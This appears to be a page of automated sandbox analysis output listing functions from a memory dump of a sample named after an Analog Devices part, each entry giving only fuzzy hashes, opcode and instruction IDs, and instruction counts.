Opcode Fuzzy Hash: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
Instruction Fuzzy Hash: DF1179B16183089FC300DF69C445A9BFBE4FF99350F00851EB998D73A4E630E900CBA2

Function 0171E016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: 065532f12d5529c6914f1bfbc15fe69f909a3e8548ea7849abcaa58411750351
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 3E012872200684DFE327DB1DCA48F26FBE8EB45B54F1904A1FE05CB6A6DA78DC40C661

Function 016F826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
Instruction ID: f1e7b3862e182a943884385be1b1bc2b67083ab69bfab49a2941d4cd199d594e
Opcode Fuzzy Hash: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
Instruction Fuzzy Hash: 4E018F35600505DFDB14EB6ADC089AFB7ADEF81220B5580AD9A02A7784EE30E902C690

Function 017AEB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
Instruction ID: 197782c4f30580af3ef38da600eccddcf1ffa7a13815811fc0075a7a0f1e8f85
Opcode Fuzzy Hash: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
Instruction Fuzzy Hash: F701A7712447019FD7315B1AD844F03FBA8EF95B60F11442DB7169F394D6B0A880CBA4

Function 01702582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2331bd4ad47533ccb49162bfbc0f1e68adcc37cc39290cdd6bb0d728489de9a4
Instruction ID: b98bc7761500e21d5632f13d7ded5677066f854026d1986b23020e851d4ee0f9
Opcode Fuzzy Hash: 2331bd4ad47533ccb49162bfbc0f1e68adcc37cc39290cdd6bb0d728489de9a4
Instruction Fuzzy Hash: 36F0F433A41B10BBC7329B5A8C84F47FEE9EB84BA0F104068B61597684DA30ED01CAA0

Function 0172C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: 352e453d508a4cddc25ed08c3c8a514227a17c1f4ba6b71a5aca2ca5cb0cc90a
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: 74F0C2B2A00621ABD335CF4DDC40E57FBEADBD5A80F048128E605CB224EA31DD05CB90

Function 017D634F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
Instruction ID: 1f52840cb8bc06ed94a5b859e0622d007642ad0872b4db37df9caa5303130a0a
Opcode Fuzzy Hash: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
Instruction Fuzzy Hash: BD012C71A1020DABDB04DFA9D555AAEF7F8FF58314F10406AF905E7350DB74DA018BA4

Function 016FC310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 6b015f415f60856a066b44daf4c12596233a54b137789a5d775857d536ad57ed
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: A9F0F633205A279BD7321A5D8C40F2BAA9ADFD1AE4F1A043DE3099B244CA718D02A6D1

Function 017D625D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
Instruction ID: ef150ae3ee8ea2638c0ffc4318758cc3f07a84ce6157ac1163dd6a85634c7ccc
Opcode Fuzzy Hash: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
Instruction Fuzzy Hash: B7017C71A1020EABCB04DFA9D445AAEF7F8EF58310F10806AF904E7354D774AA008BA0

Function 017D62D6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
Instruction ID: dd76a6cf88e57a749989dc60457d7cc00ecdaf170e1db9a40247915a5aedd6b6
Opcode Fuzzy Hash: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
Instruction Fuzzy Hash: C6012C71A1020DABDB04DFA9D445AAEFBF8EF58314F50806AF915E7390DB749A018BA4

Function 0173CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: cac5fd6370cf8c2b3d6a1ca96e6efdaf06f02d934483156fd8f201fbfb801022
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: D701F432300689ABD723AB1DC80DF59FFD9EF81754F0940E6FA449B6A2D6B8C941C221

Function 017D61E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
Instruction ID: d452d437974c3ef2763a2166f5a8d973f5ac5e5a13ee7da042f620e5e42f54d6
Opcode Fuzzy Hash: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
Instruction Fuzzy Hash: 51012C71A102599BDB04DFA9D445AAEFBB8EF58310F14405AF505A7290D774AA01CB94

Function 017863C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: 8c8e1c22019fac10b34d20a4585d5525909278caa46128a49fc343edeed8d0f1
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: 25F0127220001DBFEF019F94DD80DAFBB7DEB55698B104125FA1192160D631DD21A7A0

Function 0178A4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
Instruction ID: b4412a2445a6bbaa72174215b9ad5f0d8161da46926c5645e6df31d27af86e32
Opcode Fuzzy Hash: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
Instruction Fuzzy Hash: 1A018936100149ABCF12AE84D840EDA7F66FB4C664F058116FE1866224C332D9B0EB91

Function 016FC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
Instruction ID: 31b73c4db135c3d7b23338d4de90435a68e48c6858999142747bb58fed4b1589
Opcode Fuzzy Hash: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
Instruction Fuzzy Hash: 86F024726042495BF354DA1D8C02F23329AE7D0696FA5806EEB058B3C1EF71DC1283A6

Function 0173656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
Instruction ID: 73cf9a47e2c8b145a7eb3f894fa6fe0618934c9c98cc488b6cbe50a5333b8290
Opcode Fuzzy Hash: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
Instruction Fuzzy Hash: AE01A470301681ABE7229B2CCD4CF25BBE4BB80B14F5841A4BA019B6DBD728D541C220

Function 017A437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: ac8e2bd7dba67c94de5246563d6f4fc9bfe3c536439dff5f61264cd616cb40c7
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 06F0E93534191347EB35AA2E8424B2EEA559FD0A01B4D472D9603EB644DFA1D8058790

Function 0178E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: de8f51ccfb9caabe7a984b457dac0bf8a80a2489880a545ef30a013a6fa5e0f8
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 25F082337E56229BE331AE4ECC80F1AF7A8EFD5A60F191475A6149B264CB60EC41C7D0

Function 0178C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
Instruction ID: 85e0d51f55ec4d9011eb6944c06f71e40d6fffd7aa350a5c9acb2cbc2df5ecb1
Opcode Fuzzy Hash: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
Instruction Fuzzy Hash: BDF0AF706593049FC310EF68C445A1BF7E4FF98710F80465AB898DB394E634E900CB96

Function 01730854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: a255d424a4dc6c927bb3d4c465695fc852ce311719750ff573b958c35370a1b1
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: 0FF02472600200AFE314DF25CC00F86B7E9EFE8304F148078A544CB164FAB0DD10C694

Function 0178C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
Instruction ID: 19df370ede48d378798e223da9b4cb2de232315d7249ec021c158208ef82181a
Opcode Fuzzy Hash: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515EAEF7B4FF18300F108059B955EB399DA34EA01CB64

Function 017047FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
Instruction ID: f36c0fd6dd9cdb6503e58c11651ea6757317af21fb2b42147e68092d077f135d
Opcode Fuzzy Hash: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
Instruction Fuzzy Hash: 7BF0B4719967D5DFE733DB6CC444B21FBD49B01621F084DAAD74B875C2C7A4DA80C650

Function 017C0115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
Instruction ID: 5ccd9cd67484830c00e09b31cb87b58aedf807e95cd2f0600371397d1e3db2d7
Opcode Fuzzy Hash: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
Instruction Fuzzy Hash: 3FF0272E41A6808BCF329B2C68983DAEB55E781A24F09144DF4A057209C6748883C3A0

Function 0173C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
Instruction ID: b46435dd72bf7a016a8b7172a4572b3d9618608dcc926e1451c0a746dcfa163d
Opcode Fuzzy Hash: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
Instruction Fuzzy Hash: D4F0E271511691DFE3239B2CC948B11FBE89B857A1F089467D50697523C760E880DA51

Function 01742619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 0e6076e6981fb16d23bad64a048914ba76001553a721abaed099aa690958608b
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 81E0D8323006016BE7119E599CC4F47BB6EDFD6B10F050079B6045F256CAE2DC1986A4

Function 01796030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 21abb0275011dc807c9c6189ef12aa37eabace2ed3cc2651f38b763893dae151
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: B1F01C721046049FE7218F0DE984F62FBB8EB45364F45C166E6099B661D379EC44CBA4

Function 01700710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: fbff1d49b80a0f52ab5d7b6267f0d592d85c73777b170b3b40a6e253f4de0dac
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 5DF0E539204741DBDB17CF19C040B95FBE4FB413A0B000094FC428B341DB75E982CB90

Function 017349D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 527e57a11d02900a5696d38ce279acb97cd39b140376003db12607fa52326762
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: C1E0D832244145ABD3291A698808B66FBA5EBD57A0F150429E2028B156DB70DD42C7D9

Function 017D4164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
Instruction ID: 9159497725958f7a09d5e198e88793681d8297a144976561d5f92bc413351029
Opcode Fuzzy Hash: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
Instruction Fuzzy Hash: 67F0E531A255954FE772D73CEA44B56F7F1AB10630F4E0564D4128BD16C330DC40C650

Function 017A678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 132e08e4d955a0d987bda54132559c613b9a1b8bde6428744ecd29b17995becd
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: 1AE0DF32A00120BBDB2197998D09F9AFEACDBD4EA0F090054B601EB0E4E530DE00D6D0

Function 017D08C0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: be7b28d7586b3abbd8cd96d32608b0fa690ae90a7d5b443a5ee4f56c1f77fe41
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: B4E09B316803588FCB259A1DC141A53FFF8DFB5660F1590ADE90547612C231F842C6D0

Function 017025E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
Instruction ID: 50a79989b928991ef7d63be24baba234eb71e5828f291519bbb911b3f707b912
Opcode Fuzzy Hash: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
Instruction Fuzzy Hash: 78E09232100A549BC322BF29DD09F8BB7DAEB60770F014529B115571D9CB30A810C788

Function 017BA456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: c64c0a1d0fae6a032f70fd0eaa66c2841e6d2f0a3ca7189eee43e2a31850fcfd
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: E2E06D31010A11DBE7326F2ED84CB92FAA0AF50711F148C29A096124B4C7B898C1CA40

Function 01784000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: e18edc8b234446c227e04b83218ce8e151f5e980391312d31003b3b2fa6f706f
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: E0E0AE343403068BE715DF19C040B62BBB6BFD5A10F28C0A8A9498F205EB72A8438A40

Function 016F823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: e3299b9bdbebdc0e9b79036e25357e0f19eea28780ea496714054a5c150220f2
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 04E0C235000A10EFDB322F19EC04F51B6A9FF94B60F21886DF182070AA97B0BC92CB84

Function 01702050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
Instruction ID: 3dd7326e6234c66221aef1fa8af75f527ccbf7fb3fd4e0690a8749111991a836
Opcode Fuzzy Hash: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
Instruction Fuzzy Hash: AFE08C32100550ABC312FA5DDD04E4AB3DAEBA4770F004125B151876D8CA20AC00C794

Function 01738A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

